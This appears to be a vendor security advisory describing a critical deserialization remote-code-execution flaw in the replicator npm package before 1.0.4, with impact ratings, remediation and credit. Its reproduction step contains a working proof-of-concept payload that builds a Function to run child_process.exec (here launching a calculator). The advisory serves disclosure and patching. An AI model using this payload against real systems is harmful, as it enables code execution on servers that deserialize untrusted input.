Deserialization RCE Attack In Replicator - CX-2021-4787

Severity

Severity: 9.8 - Critical Severity

Advisory Timeline Summary
Affected versions of replicator npm package are vulnerable to a deserialization RCE via the TypedArrays objects. replicator doesn't verify the object type given when deserializing TypedArrays and thus letting an attacker create arbitrary objects.

Product

replicator before 1.0.4.

Impact

In case an untrusted data get deserialized, an attacker could achieve RCE.

Steps To Reproduce

replicator.decode('[{"@t":"[[TypedArray]]","data":{"ctorName":"setTimeout","arr":​{"@t":"[[TypedArray]]","data":{"ctorName":"Function","arr":"process.mainModule.require(\'child_process\').exec(\'calc\');"}}​}}]')

Expected Result:

The command in the exec function will be run, in this case aimed for a Windows machine a calculator will pop up.

Remediation

Update replicator dependency to 1.0.4 or above.

Properties

Attack Vector:Network

Attack Complexity:Low

Privileges Required:None

User Interaction:None

Scope:Unchanged

Confidentiality:High

Integrity:High

Availability:High

Credit

This issue was discovered and reported by Checkmarx SCA Security Researcher Yaniv Nizry.

Resources

  1. Pull request
  2. Issue
  3. Commit